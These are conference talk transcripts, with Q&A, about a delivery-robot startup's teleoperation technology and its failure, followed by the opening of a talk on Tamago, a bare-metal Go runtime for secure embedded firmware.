this. This is like the control panel for a robot. It was super simple. We had a video call coming in from the robot on the left over there. It was like literally an iframe, super simple stuff. And on the right, we had a map. On the bottom, we had some controls so you can move the robot forwards, backwards. It was very, very simple. It barely worked. On the robot, we had an Arduino, a Raspberry Pi, all running like in Python, and then the server was Java, communicating over WebSockets. But this barely worked. So we decided, okay, what can we do? Maybe we can build an autonomous robot. Maybe we can build something that would work entirely by itself. We actually did that.
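To make that first version a bit more concrete, here is a minimal sketch of what a robot-side command loop could look like. This is an illustration only, written in Go for brevity rather than the Python/Java stack just described, over a plain TCP connection instead of WebSockets; the message format, address and drive function are all made up.

// teleop.go: hypothetical sketch of a robot-side command loop.
// The real robot ran Python on a Raspberry Pi talking to a Java server over
// WebSockets; this sketch uses plain TCP and JSON to stay dependency-free.
package main

import (
	"encoding/json"
	"log"
	"net"
	"time"
)

// Command is a made-up message a control panel might send.
type Command struct {
	Linear  float64 `json:"linear"`  // forward/backward speed, -1.0 .. 1.0
	Angular float64 `json:"angular"` // steering, -1.0 .. 1.0
}

// drive would hand the setpoints to the motor controller (e.g. the Arduino
// over serial); here it just logs them.
func drive(c Command) {
	log.Printf("drive: linear=%.2f angular=%.2f", c.Linear, c.Angular)
}

func main() {
	conn, err := net.Dial("tcp", "control.example.com:9000") // placeholder address
	if err != nil {
		log.Fatal(err)
	}
	defer conn.Close()

	dec := json.NewDecoder(conn)
	for {
		// If no command arrives within 2 seconds, treat the link as lost and stop.
		conn.SetReadDeadline(time.Now().Add(2 * time.Second))
		var cmd Command
		if err := dec.Decode(&cmd); err != nil {
			log.Printf("link lost or timed out: %v", err)
			drive(Command{}) // zero command = stop
			return
		}
		drive(cmd)
	}
}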
So we built a robot that could go entirely by itself. It was fully autonomous. And it was actually really cool. The way we built it is we had a pretty beefy computer inside, an NVIDIA Jetson TX2. On that, we were running ROS. Inside of ROS, we were running TensorFlow and a couple of other technologies. We had YOLO for object detection and some other cool tech that I'm not entirely familiar with since I didn't write that code. But over here, what the robot did is it looked at objects. So it was detecting objects. It was also measuring the distance to the objects. And it also had an inference neural network. And you can see that on the top left of the screen here. Basically, based on trained data, it would know where not to drive into. And it would try to plot a path based on 12 different directions it could go into. So it had 12 directions. And it would go in the direction which had the highest probability of not colliding with somebody or something. And this worked okay. We were able to get like 99% autonomy. But the problem is, since we're doing a commercially viable delivery service that's offering deliveries to regular people, and it's not doing something in the lab, we really had to do something that worked all the time. And the challenge with this is we still needed to have people in the loop. We still had to have people who looked at the robot to make sure it would actually not crash. And what happens if you have something that's fully autonomous and people assume it works well? When it doesn't work well, instead of looking at the screen and being ready to take over, they're just looking at their phone and Instagram. So this approach wasn't the best one and instead we decided to use a supervision approach. So we spent a lot of time building this. So this is our supervisor's console and it's actually a really, really cool platform. It's a platform that allows you to connect to a robot and the robot streams video to you over WebRTC over like the 4G network and you're able to control it over WebSockets. So the way it would work is you would have a supervisor that sets waypoints for the robot to follow. So the supervisor would just click on the image and he or she would tell the robot to move 10 meters at a time. So typically the supervisor sets waypoints every 5 to 10 seconds. It was a very interesting approach. We tried a couple of different approaches. We tried to do SLAM. That really did not work out for us. It took too many resources and it didn't give us a significant gain. We tried other things as well. We tried traffic light detection. So we tried traffic light detection. There are some amazing models available online, some great GitHub repos. The problem is, yes, they do work on a very clean data set, but when you actually have real data, a real-life scenario where you have like glare, you have rain, you have weird situations, you have homeless people, it doesn't really translate that well in the real world. So we kind of struggled with that. Instead, we actually had a more middle ground approach. So we are able to detect traffic lights really well, but we're not able to detect the color really well, which kind of signal it's giving. So instead, what we do over here is it automatically zooms in on the traffic light, so it's very easy to see. This video actually that you're seeing is transmitted at a very low frame rate, very low bit rate as well. I think we're doing 480p at 100 kilobits a second. So it's very, very low bit rate.
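Going back to the 12-direction planner for a moment, the decision step can be pictured roughly like this. The sketch below is an illustration only; the real system ran ROS, TensorFlow and YOLO on the Jetson, and the scores, confidence threshold and sector layout here are invented.

// Hypothetical sketch of the direction-picking step: the network scores 12
// candidate headings and the robot steers toward the one with the highest
// probability of not hitting anything.
package main

import "fmt"

const numDirections = 12

// pickHeading returns the index of the candidate direction with the highest
// "clear path" probability, or -1 if nothing looks safe enough and the robot
// should stop and wait for a supervisor.
func pickHeading(clearProb [numDirections]float64, minConfidence float64) int {
	best, bestProb := -1, minConfidence
	for i, p := range clearProb {
		if p > bestProb {
			best, bestProb = i, p
		}
	}
	return best
}

func main() {
	// Example scores as they might come out of the inference network.
	scores := [numDirections]float64{0.05, 0.10, 0.40, 0.82, 0.91, 0.88, 0.30, 0.12, 0.07, 0.02, 0.01, 0.03}

	if i := pickHeading(scores, 0.6); i >= 0 {
		// How the 12 sectors map to actual steering angles is an assumption
		// of this sketch, not something described in the talk.
		fmt.Printf("steer toward sector %d (%.0f%% clear)\n", i, scores[i]*100)
	} else {
		fmt.Println("no safe direction, stop and ask for supervision")
	}
}

In production, though, it was the supervised approach with the low-bit-rate video stream described above that the robots relied on.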
And when the robot isn't moving, we actually make it go black and white and even lower frame rates so that it doesn't waste resources. So yeah, it's pretty cool stuff. Over here on the top left, we actually have our latencies. So we managed to build the infrastructure that allowed us to supervise these robots from Columbia for like 200 milliseconds, less than 200 milliseconds. So it's like a blink of an eye. It was a really, really cool technology. It worked over 4G, and we did a lot to optimize that. We had also a map over here. So this map is really, really cool. A lot of people ask us, like, hey, did you do mapping? Did you map out your environment? Did you need to have something there before you came into a new place? And the answer is no. But what we do instead is we actually map out the network conditions. So we would map out the network conditions of a city, and we would say, okay, these areas like over here, this is like high latency, we should avoid those areas because the robot could get stuck there. And it's actually very interesting to see the network conditions change continuously. Like you didn't have the same network conditions every day, all day, all year. They'd actually change every few hours. So it was something that took us a while to figure out. So of course, the way this worked is we had two or three people supervising, sorry, two or three robots per supervisor in Columbia, and we had like just a bunch of people, typically students who would just be working part-time, and they were sitting in an office in Columbia doing this. Of course, the press found out about this, and they wrote a very small bit of text in this article saying, like, oh, Kiwi hires Colombians and pays them $2 an hour. And people were really frustrated about that. We had a lot of interesting feedback about that. But what was interesting to see is that this technology actually helps people in Columbia. If you're there, it's a third world country, it's a developing country. You can get a job at a factory, you can get a job at like a textile shop, you can get a job maybe McDonald's, but there aren't that many tech jobs per se. The biggest employer in the country is a phone support company. So like when you call in to support land, support line, you get connected to Columbia sometimes, and that's the biggest employer in the country. So in order to get like a tech job, it's really, really hard. And giving people the ability to like go and supervise robots, it's something that helped them get something on their CV, it helped them step up, it helped them learn a little bit more about the technology and helped them progress in terms of their careers. Our lead AI guy, he actually started off as a supervisor and he went up through ranks and then he ended up leading the AI and robotics team. So it was really interesting and really inspiring to see how that transition happened. And we managed to get our technology to work so well that we can do this. So we were able to get it to work with up to eight seconds latency, which meant that you can control it literally from anywhere in the world, so even from like an airplane above the Pacific Ocean. So it was a really, really interesting experience and we really try to make it simple. So in conclusion, for AI, we realized that the best approach was to keep it simple. We tried a lot of different approaches. Like we tried the traffic light detection, we tried yellow pad detection, so I didn't mention that. 
So in Berkeley, you have these accessibility ramps and you have yellow pads so that blind people can actually like feel them and see them easier. So we built the algorithms to detect that and we thought that, okay, maybe if the robot is stuck in the middle of an intersection, it can automatically detect this yellow pad and navigate to it. It's an approach that worked in theory; in practice it did not quite work. We tried segmentation. So that was an approach that worked okay, but some weird things broke it. So for example, any lamp posts or bicycle posts would crash the robot because it didn't see them. So yeah, keeping it simple was the best approach. Really not going too crazy. The approach we ended up going with in the end was to have it more of like a driver assist type, like a parallel autonomy approach, where our robots would help people the same way that cars would help people stay in lanes or have cruise control or like with parking assistance. So that's kind of the approach we're having. I think long term, it is going to be possible to build a robot that's more autonomous; there are companies like Starship that have some interesting ideas about how to solve that. But I don't think it's quite something that can be scaled to every city just yet. Another really important thing is the lab does not equal the real world. So there were many, many great examples of fantastic research papers from some great groups and they were great with very polished, very clean data sets, but they did not work when you deployed them on 100 robots. They were all different. They all had slightly different camera calibrations, they all had slightly different hardware, they all had slightly different chassis. So it did not really translate as well. So these algorithms, these lab best case scenarios, really need to be modified a little bit. What else? Yeah, one thing, maybe jumping back to the keep it simple: we decided to put in a very simple safety mechanism. So the robot actually brakes if it sees something within 50 centimeters in front of it. So it's kind of like a last-resort precaution. As you saw before, there's a video, like you can supervise the robot from anywhere in the world with a lot of latency. But having this 50 centimeter hard brake actually saves us in case the robot loses connectivity or the supervisor is no longer able to supervise the robot. So it's always braking 50 centimeters away from any collision with like a baby or a car or whatever. So the approach we really thought about is like, how can we expand human potential? There's a lot of talk about like AI taking jobs or AI replacing people's roles, but we sort of tried to do that and it didn't work. Like we tried to build robots that were fully autonomous, that went from the restaurant to your door, and that didn't work. People were waiting a really long time, these robots required an insane amount of maintenance. So we ended up going for an approach that was far more parallel autonomy, where these robots were helping people to do more. The same way, the supervisors get these assistive technologies where they're able to just set a waypoint to do the path planning and the robot does the motion planning on board. We also had the couriers who would just load food into the robots instead of the robots picking up food from the restaurant directly. So really expanding human potential, I think that's where it's at.
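To illustrate the 50 centimeter hard-brake rule, here is a minimal sketch of that kind of gate. The sensor access and motor calls are stubbed out and all names are hypothetical; only the idea of braking below a fixed clearance, independently of the remote supervisor, reflects what was described.

// Minimal sketch of a last-resort brake: every remote command passes through
// a gate that stops the motors if anything is inside the safety envelope.
package main

import (
	"log"
	"time"
)

const minClearance = 0.50 // meters; below this we brake no matter what

// frontDistance would read the forward-facing range sensor; stubbed here.
func frontDistance() float64 { return 1.2 }

// stopMotors would cut power to the drive motors; stubbed here.
func stopMotors() { log.Println("BRAKE: obstacle inside safety envelope") }

// applyCommand forwards the supervisor's drive command to the motors.
func applyCommand(linear, angular float64) {
	log.Printf("drive: linear=%.2f angular=%.2f", linear, angular)
}

// safeApply is the gate every command has to pass through, so the robot
// brakes on its own even if the link drops or the supervisor is distracted.
func safeApply(linear, angular float64) {
	if frontDistance() < minClearance {
		stopMotors()
		return
	}
	applyCommand(linear, angular)
}

func main() {
	// In the real system the latest supervisor command would come from the
	// network; here we just gate a fixed placeholder command every 50 ms.
	for range time.Tick(50 * time.Millisecond) {
		safeApply(0.5, 0.0)
	}
}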
And over the course of the past century, we've seen a lot of examples of this kind of expansion of human potential. Like elevator operators: before, elevators had operators who would make them go up or down, and now they're fully automated. And switchboard operators who would connect phone calls: now we can make a phone call to anywhere in the world instantly for free. So we're seeing this transformation of work and transformation of the way things are done. And I think this is just the start. The way I see these robots is really meshing into the fabric of our societies and solving physical transportation. Like sure, you can move bits from anywhere to anywhere in the world, but can you move atoms? It's really expensive to do that. It's really hard to do that. That's where I see robots expanding human potential. So, conclusions. What we did was really cool. And I think it was a cool experience. One thing that we realized is that tech isn't the hardest part. We spent a lot of time figuring out how to build something, but figuring out what to build is sometimes very important as well. And I don't think we spent enough time asking ourselves that question. We kind of went in all sorts of directions. We didn't focus as much on making the best product possible. We kind of tried things that were really weird and not well thought out. So having that more long-term thinking, thinking about what we should build, is very important. Because the how, you can just look up a tutorial on Google; figuring out how to build a robot is not the end of the world. One really important thing for us was interaction. So interacting with people, figuring out how to make the door open when you actually receive your food: super hard. That's super, super challenging to do. Ours is actually the only robot that opens the door for you; other companies like Starship, for example, have a button that unlocks a solenoid. So the experience is not quite there. You have to bend down and you have to figure out if the door actually opens. So we spent a lot of time, a lot of effort in order to optimize that experience to make it as smooth as possible for people. So one thing we didn't figure out is financing. I'll come back to that in a second. That was really, really hard to do as well. So tech: not the hardest. Financing, figuring out how to manage cash flow: super important. But I think the most important thing is to work with a great team. If you're going to be spending a lot of time with people who you eat, live, and breathe with, it's really important to choose a team that you really connect with and that shares the same passion as you do. Because you could be miserable, making an amazing amount of money, but if you're with a really crappy team with a high turnover, it's really boring. I was really fortunate to work with one of the best teams in the world. And over the course of the past two and a half years, we managed to do quite a lot. And just last month, we actually got an article in the New York Times. So it was a really big accomplishment for our team. And we got to share it with our families. My mom was really proud. So a lot of great traction and a lot of great coverage. But unfortunately, we actually ran out of money. So we ran out of money last month. And we are no longer delivering things. So I decided to leave and start my own thing. Instead of doing robots, I decided to do data. So now I'm actually focusing more on building a tool that helps you tell stories with data. So this is Glint. This is a data storytelling tool.
You're able to drag in some files. And it tells you the story of your data without you having to write any code. So my hope for this is to allow anybody in the world, without any knowledge about how to wrangle data, how to clean data, how to analyze data, to be able to tell stories with their data directly from their computers. I'm imagining a tool where you can say, oh, in December, there were XX visitors to Congress. Or last summer, we had XX sales. And it automatically fills that in for you. That's kind of what I'm thinking about. If you want to join the effort, it's on GitHub. I'm more than happy to have any contributors. And if you have any questions or comments, more than happy to answer on Twitter or here in person. Thank you. So as usual, feel free to line up in front of the microphones, or send your question to the signal angel over there. It's all the way down. Go ahead. Okay. Here's a user of your service who apparently got an email from you that announced some changes. So he's wondering what you're planning to do there, whether you're continuing your service or closing shop. Yeah, it's unclear. We ran out of funds. So I think the CEO is still trying to figure out what to do with that. I wish him the best of luck, but I ended up leaving with a lot of other people. So we had like 50 people in November. Now we have like 10 people left in the company. So it's very ambiguous what's happening, but yeah, I left. Yeah. Hi. Microphone? No audio. Ah, okay. Now it works. I'm a little bit confused, because you are presenting a 1970s concept of a manipulator: a robot is something that works by itself, and a manipulator is something where somebody has some joysticks and moves things. So it's nothing special. You just have an internet link for a manipulator, and in the 1970s there were cables. So what's the special thing? Yeah, that's a good question. I think the magic here is connecting everything together, figuring out first of all how to build these robots, how to build a reliable connection and how to build a platform that works. And as I mentioned, like the how, that's not that interesting. It's more the what you build. It's that experience where you're able to order anything you want, anytime, and get it delivered in under 30 minutes virtually for free. So for example, evil people could just buy a remote control car, put a bomb in it, drive under a police car and like boom. It's the same use case. You deliver something. Is there another question there? Yeah. Hello. You talked about iterating quickly and rapidly, and that's a very good model for the conceptual stage and for software. Were you in the stage where you were releasing your hardware with your iterations? Because usually a big stack of certification has to come in between. So I'm not entirely sure. Are you asking if we got certified at every single release? I suppose yeah. At what level of recertification was it actually released, did you have to meet regulations? For each iteration? Yeah, absolutely. We didn't really get certified, because we're not building a hardware product for consumers, so we're not selling it to anybody. We're operating it ourselves, so we don't fit under the same kind of requirements. However, we did have to have some permits, and part of the conditions of these permits was that we had to meet some expectations, but they're very, very basic and they weren't rigid like an FCC or a CE certification, for example. That was the question. Yeah, thanks. Thank you. Yeah. Another question from the internet.
Why did you develop different applications for Android and iOS? For the consumer application? I haven't got any more details. We just did. I mean, we had first an iOS application. I mean, 80% of our customers were using iOS, so we really spent a lot of effort polishing that iOS experience, making sure that worked. And at one point our Android app was working super badly, so we decided to kill it, and everybody was really, really pissed off, extremely pissed off. So we actually reintroduced it and we started catching up with features to the iOS version. Internally, all of our apps were built in React and React Native, so we had like a common framework for all of our internal apps, but we weren't getting the quality of experience that we expected from a consumer app using React. That's why we had two different code bases. Yeah, on the right. What about the different methods regarding perception, for example LiDAR, radar, and what are your conclusions from that? Yeah. We tried LiDAR. We tried the cheap LiDAR. We didn't try like a really high-end LiDAR. So the challenge with having point clouds is that you have to compute, you have to spend a lot of time computing. We were using a relatively low-powered device and it was running from batteries, so we didn't have the luxury of having like 10 GPUs in the trunk of a car, for example. So that was one approach, one question. Another question is how much does it cost? So LiDARs, they can cost $10,000, $100,000. Our bill of materials was around $2,500. The last version was $2,500. So all of our sensors were very minimal. In terms of what sensors we tried, we tried a lot of different sensors. We tried ultrasonic sensors. We tried near-field infrared sensors. We tried other sensors. We tried a lot of different sensors. We ended up just going with cameras. So we have cameras. We have six cameras on board, all of them full HD. We stitched them into an image on our compute module, and then the supervisor decides which portion of the image they want streamed, so they can manipulate with their keyboard to see which portion of the image is streamed. So we don't stream the whole image. We just stream part of it. The really important part for us was to make something that's viable, that can be used commercially. So I'm sure LiDAR is really cool, but I'm not seeing any commercial deployments of LiDAR-based autonomous vehicles or robots yet. Thank you. Yeah. Yeah. You have tried out many different concepts, how to do it, and you saw that your company ran out of money. Do you still believe in the business concept of robots delivering packages or food? Who knows? I think it was a great learning experience. We learned a lot. We had a great team. And I think we'll see some concept of robots, maybe not exactly what we were building, maybe something a little bit different. But I think it's a little bit inevitable, especially with the rise of self-driving cars. Maybe we'll have cars delivering packages instead of robots. I'm not entirely sure what it would look like. I can tell you Amazon bought one of our competitors, Dispatch Labs, so they're making a big bet on this. There are two delivery companies in the US, Postmates and DoorDash, that are building products internally also with delivery robots. And companies like FedEx are also building delivery robots. And then we have companies like Starship, for example, which are building robots and doing B2B with companies all over the world.
I think we'll see some form of delivery robots. I don't know if it's going to be what we had or what somebody else is going to have. Whether any safety certifications you have to satisfy in order to operate around people? No. So the thing is in the US, it's kind of just do whatever you want. It's very different from Germany. You can kind of just do things and you can do them until you get in trouble. So we kind of had that approach, don't ask for permission, ask for forgiveness. We ended up having to have a permit in the cities we operate in, but it was very simple. It was like, okay, you have to have lights, you have to have a phone number, and you cannot go in these areas. That was essentially all the authorization, all the permitting and certification that we had. Yeah. I wanted to ask, did you try other markets? Like autonomous drive is very hard, even way more to manage it fully. So like perhaps elderly care, like you could use these robots in elderly care where you have a controlled environment where everything is the same. Did you search after other markets where it's less? Yeah, it's a great question. Yeah, there is a lot of potential for markets like elderly care, for example, also for mail delivery, for applications inside of factories. We had a couple of different medical companies that reached out to us and were like, hey, we want to move items, move packages inside of our facilities. So we did have a lot of interest. We try to keep a focus on the consumer space, like really building a consumer experience that worked out before branching out into these more B2B approaches. But yeah, elderly care could have been one of them. I think one important thing about elderly care and services like meals on wheels, for example, is that human contact. So I think people who are maybe not seeing as much of their family, of their relatives, they really cherish that connection they get from the people who deliver them food. So I think it's a multifaceted approach they have to have. You have a couple of different considerations with these kind of services for the elderly, for example. What kind of personality do Chinese entrepreneurs have? I think, as I mentioned, it's really important to have relationships. So they were very interesting. They were very deeply in belief of their government. They had nothing bad to say about it. They believed that it would bring them everything the best possible, even though they still try to access Facebook and Twitter with VPNs. So they were very, very loyal to their government. They were very, very diligent. If they committed to something, they would usually deliver on that. They really wanted to make sure you had a good experience. And also what we saw, for example, with building up these relationships like the first few times we talked, they would try everything to impress us. So we got taken to these ridiculously expensive restaurants to make sure that we were welcomed well and make sure everything was right. Actually, I had an interesting episode earlier this year. I was going to go to Burning Man, and then all of a sudden one of my colleagues had an argument with my manufacturer about whether Hong Kong is another country or not. And I ended up having to go to China to deal with our manufacturer instead of going to Burning Man to make sure we're aligned in terms of our beliefs. Sometimes it's really delicate. You cannot talk too much about the government there. You can't talk too much about politics. 
It's best to stick to business and focus on building a product. I guess this was it. Thank you so much.
Over the past 2 years we've been building delivery robots - at first thought to be autonomous. We slowly came to the realization that it's not something we could easily do; but only after a few accidents, fires and PR disasters. We've all seen the TV show Silicon Valley, but have you actually peered underneath the curtain to see what's happening? In this entertaining talk, Sasha will share his first-hand experience of building (and failing at) a robotics delivery startup in Berkeley. Over the course of 2.5 years this startup built hundreds of robots, delivered thousands of orders, and had one robot stolen. The talk will look at the insanity that's involved in building an ambitious startup around a crazy vision, sharing the ups and downs of the journey. It will also touch lightly on the technology that drives it and the simplistic approach to AI/machine learning this company took.
10.5446/53200 (DOI)
The first time I met our next speaker was 12 years ago at a conference in Berlin that Shell renamed unnamed where he presented an automotive car hacking talk before it was called car hacking where he injected RDS traffic and could reroute your navigation system. Luckily, he's no longer breaking cars but instead went on building secure stuff. And for one of this, the USB armory that you might have heard of, he has now come up with Tamago, a full bare metal go runtime for your secure software development needs. Please give a warm round of applause to Andrea Baridani. Thank you. Can you guys hear me? Yeah. Okay. Thank you for the introduction. Thank you for reminding me how old am I? And yeah, so we still break cars but just we, that's work now and not fun anymore and the fun stuff is actually this one. But we still break cars actually. So I work for F secure, just a little bit of introduction by myself. I work for F secure and some of you might know me for a company which I founded which is called Inverse Path which was acquired a couple of years ago by F secure. I'm one of the offer of the USB armory and yeah, as it was mentioned introduction, I work a lot with hardware and embedded systems on safety critical systems such as airplanes, cars, industrial systems and so forth. And because I'm getting old basically, now I tend to like to build things, to make things rather than only breaking them. I think this is a inevitable phase in the life of information security researchers and because you get a little bit tired of just pointing your finger at things that are broken and at some point the industry becomes so good at breaking things that I think that we also should stop a little bit and think about creating tools hardware and software which can really serve the non security community better into solving all kind of security issues because we see that there are a lot of issues that they never change despite the fact that we'll almost in 2020. And one of the motivations for us into building open hardware such as the USB armory and Tamago which is directly linked to the USB armory as you will see, it's also to provide better tools tools that are maintained that work that are clean that are trusted. And I think this is a phase that a lot of information security researchers at my age now are getting through which again is just a guess getting old. So the USB armory is an open hardware computer which is meant to be a secure enclave in a very very small form factor just a USB device and Tamago is based on our need to build software in a better way for this device. So the whole inspiration comes from the journey of creating this hardware. And it comes from a very simple scenario that we face while testing all kind of embedded systems. So I'm a strong believer of the fact that just like natural language, I mean, if any of you want to code for a specific device in whatever language you like and you prefer, you should be able to do it. And if that language for some reason, its implementation generates a compiler which is not fast enough for you to have a successful project on any piece of hardware, that is not necessarily your fault or it shouldn't be your fault in choosing the wrong language. It shouldn't be any wrong language. The language should be adapted to your need, to your style. As a programmer, as a developer, we should in an ideal world care or not care at all about how the compiler is optimized or not. In an ideal world, all compilers should generate machine code with the same efficiency. 
If you like to do math in SQL queries or in Rust, Python, assembly, whatever, in an ideal world, like a Star Trek, you should all generate the same byte code because the intention that you're giving to the code remains the same. You want to do the same operation. However, we do not live in an ideal world. We live in a real world. This means that developers, to make the choices that they need to make in selecting framework and languages, they really need to be careful about the implementation that the language is reflecting, the implementation that the language is supporting, that the hardware that it is supporting. This is not ideal. Usually there are very two distinct scenarios. We have hardware, we test hardware for a living that has lower specifications microcontroller units, which are used because engineers want to simplify their design or they want to save money on the parts, whatever the reasons. The only practical choice or the only real world choice for programming on these devices in a product production system is by using unsafe lower level languages, which is typically means mean C. We tested in our cryptography tokens, wallets, hardware diodes that play a very important role in ensuring separation of safety boundaries on things like cars and planes and all your lower specifications, IoT and smart appliances, they all have firmware that despite doing operations, which are pretty basic, they're all written in a language which is unsafe from an implementation perspective. On the other hand, if we have hardware with higher level specifications, we can code in pretty much anything we want, but we need the support of a complex operating system to do that. If we have a system on chip and we can run Go, Python, whatever, higher level language on it, we're just shifting complexity around. The complexity and the, let's say, unsafeness is taken away from us as a programmer, but it's distributed everywhere else in the stack that allows us to run that code because we're going to have a Linux system, we're going to have a lot of drivers that maybe we don't want, we're going to carry on millions of lines of code that are not strictly necessary for the task that we're doing. As we know, complexity is an enemy of security. If I want to program a system in a higher level language, I just don't want to put all of that complexity under a carpet and have it there running underneath me. I just want it to go away. As a security person, that's the reason why I pick a higher level language. We face these two scenarios and none of them is ideal. Also, in this case, now we see a shift toward system on chips away from microcontrollers, also in avionics, in any kind of system which needs to be a little bit more complex, your home router, higher specification IOT and smart appliances, and we also see, which is quite common, that despite having this power and the underlying OS, we still see C applications running in user space on this system. Your infotainment system is very likely to do that even if there's no good reason for doing so. We pop them all the time because inevitably C is a hard language to code with. We should realize that no matter if you're a C lover or not, it is now vastly proven that it is very difficult to have production grade code done by a lot of developers to be safe because it just takes too much toll on the effort for making it safe. Our penetration testing rate on this kind of system is always 100%. 
As we built system on chip-based hardware, we didn't want to face these situations. We didn't want to write bare metal code in C, and at the same time, we didn't want to have our higher-level language applications running under complex operating systems. Our goal in doing this is to reduce the attack surface of embedded systems. We don't want to carry millions of lines of code that we feel are unnecessary. We want a system to perform only the bare minimum of what we need to do, and we think that this can be done by removing any dependency whatsoever on C code or complex operating systems. We want to avoid shifting complexity around or having complexity hidden from us. We want to run a higher-level language such as Go directly on the bare metal, and that is the motivation for Tamago, which is directly inspired by creating the USB armory in the first place. Now, of course, a lot of you, I mean, I would assume that some of you know Go here, and a lot of people are thinking, why not Rust, and we're going to get to that. The point here that we're trying to make with this project is: why not both? We want people to have the choice of using the language that they want. And since we want to use Go, that's why we created this framework. So why Go? So first of all, a disclaimer, because I know when we enter into these topics, there's a lot of frameworks. People have feelings. I have feelings. You have feelings. Everybody has feelings about languages and so forth. So this is not a talk about saying that language X is better than language Y. I'm not here to say that Go is better than Rust. I'm here to say that we think that certain languages which have less of a chance now to succeed in bare-metal applications can have this chance. So we want the ecosystem to be more diverse. And this is why we made this effort. But it's not to say or to force you or to tell you that Go is better than Rust. In fact, we want you to have the choice, and want to give a choice of Go, which wasn't present in the past. So if we look at the speed versus safety axis, so to speak, also this is not to scale. If you know Rust, if you're in love with Rust, you might decide to place the R of Rust in a different location on the chart. And this is absolutely fine. Again, this is not to scale. The scale is subjective here. But we all agree that if we would draw a line, Go is something which is, of course, slower than Rust in its end result. But it's easier to a certain extent to learn. The learning curve is certainly easier, more shallow with Go than with Rust. Rust, of course, is much better than C. Of course, it's a safe language. And if we go on the other side of the spectrum, we have C, which gives you more control, more hardware control. But it's also harder to implement correctly. And now we are in a situation where languages like Go are fairly fast, and they're much faster than languages such as Python or Ruby. So they can really be used to create binaries that run on embedded systems. However, they're a little bit detached from the hardware. So if you want to either run on the bare metal or make firmware at a low level, they're not ideally suited for now. So we want to somewhat fix that, at least for the Go language. And one of the reasons why we want to do this is because this is the typical setup of a secure firmware that we make for the USB armory or other kinds of embedded systems. We have a boot loader, which is secure booted by the hardware, by the system on chip.
So we have the first stage authentication of the boot loader. And then typically the boot loader authenticates and loads a Linux kernel image, because that's the operating system that most people use. And that's the operating system which bootstraps the whole decryption procedure for, let's say, an encrypted partition and so forth. And maybe it has drivers, it communicates with the system on chip to get some key material, uniquely derived from something stored only in that chip. So this is a typical chain of secure and verified boot to achieve authentication of all of your code and also confidentiality of the data. And the problem is that we're typically faced with a scenario where we're developing something, let's say a cryptocurrency wallet or whatever crypto related firmware. And now we code it in a language like Go. And we have very few lines of code in Go, a few thousand lines of code. We use the standard library of Go for everything, for TLS, for crypto. So we minimize the third-party dependencies and we have code which is clean and nice. However, in order to boot this image on something like the USB armory, we need to carry around a Linux image to do fairly simple tasks such as decrypting something, talking to the system on chip, doing USB and then launching our Go application. So in the end, to us, it's kind of inelegant that we spend so much time simplifying and cleaning up the code of the firmware and then we need to carry a giant operating system compared to what we need to do. And we need to update it very often, because despite the fact that you only have a few drivers exposed, you still want to keep it up to date, because you never know. But of course, you also have user space tools, which means you can try to reduce them as much as you can. You use Busybox, you use frameworks for generating compact Linux images such as Buildroot and so forth. But still, it doesn't feel like the right thing to do. This could be more optimized. And while this is an example for the USB armory, it applies to pretty much all kinds of embedded systems that we test that have some sort of security requirement and so forth. They all follow the same pattern of using a system on chip. So what we really want to do is take Go and move it down there on the axis. So we want to keep the same ease, speed and efficiency in development, but we want to have more hardware control, which also means that we want to kind of remove this red box over there. We want to take away the millions of lines of code that we don't own, that we don't maintain, that we're kind of stuck with. So this is the idea of Tamago. So of course, this is not a new concept. This is known as unikernels or library operating systems, which are single address space images which typically run on the bare metal. And their focus is to reduce the attack surface. The problem, however, with available unikernels is that most of them, not all of them, they're also called fat unikernels because, first of all, a good chunk of them is just, again, hiding complexity from you. So there's a good portion of unikernel projects that give you an API and documentation and they tell you, look, you're going to develop your application, you're going to compile it, and then that's going to be executed.
But in the end, they do have an actual kernel underneath, which sometimes is even derived from fairly complex operating systems such as NetBSD and FreeBSD, and the whole framework just puts a lot of abstraction layers in the middle so that you don't see the kernel, you don't see the runtime, and you just deploy your application. Now, this is all well and good, but from a security standpoint, this doesn't really solve the problem. In fact, I think it creates the opposite problem. So while researching for this talk, I kind of looked at all the unikernel projects that are around, and for most of them, it was really hard to find which kernel they were running. And the documentation kind of gives you the illusion that there are these magical bare metal projects, but they're actually not. A lot of them just pull in code from NetBSD or FreeBSD. Most of them are based on third-party kernels such as Mini-OS, which, granted, is still written in C, but with a much shorter and smaller code base than something like FreeBSD. And also, most of them are actually not focused on the bare metal in the sense that they're not focused on running on embedded systems, but they're focused on running on the cloud. And so they all support hypervisors, such as Xen, which is not what we want to do on embedded systems. So for all of these reasons, most of the existing unikernel projects are not really suited for embedded system development, and they don't achieve what we want to achieve, which is: kill C. I don't want any dependency on C-written code whatsoever while having my firmware running. And if I'm going to have a hypervisor, or if I'm going to have a kernel written in C, you can abstract that as much as you want, you can hide it, but it's really not going to solve the need that I have. So this is really not what we wanted. The other problem is that when it comes to security, these unikernel projects, and rightly so, they want to support arbitrary applications. So they want you to be able to compile your application in whatever language you want and then to execute it. Or they also want to be able to be kind of OSes and then provide support for multiple applications. But the thing is, if you're having multiple applications and different trust domains under a unikernel, or if you're running an application which is written in an unsafe language like C, you kind of want an industry standard OS, because you kind of want address space layout randomization, you do want stack canaries, you do want all of the security features that are the good parts of complex operating systems that are there for you. So we think, in our approach, that for unikernels such as this one, we are interested only in unikernels that allow us to run on the bare metal on embedded systems, and we want to run a single higher level language on that unikernel. We're not interested in everything else, because for everything else we think that actually maybe operating systems are a little bit better. So we don't want to focus on the cloud, we don't want to rely on a hypervisor. And again, I explained why we chose Go: it's what we use a lot, and so we wanted to give Go a chance because we think it has a shallow learning curve. So productivity can be very good with Go, and also, primarily, it has a very strong cryptographic library that we want to use. And again, Rust has already proven that it has a role in the bare metal world. So it has nothing to prove and it's going to succeed as well.
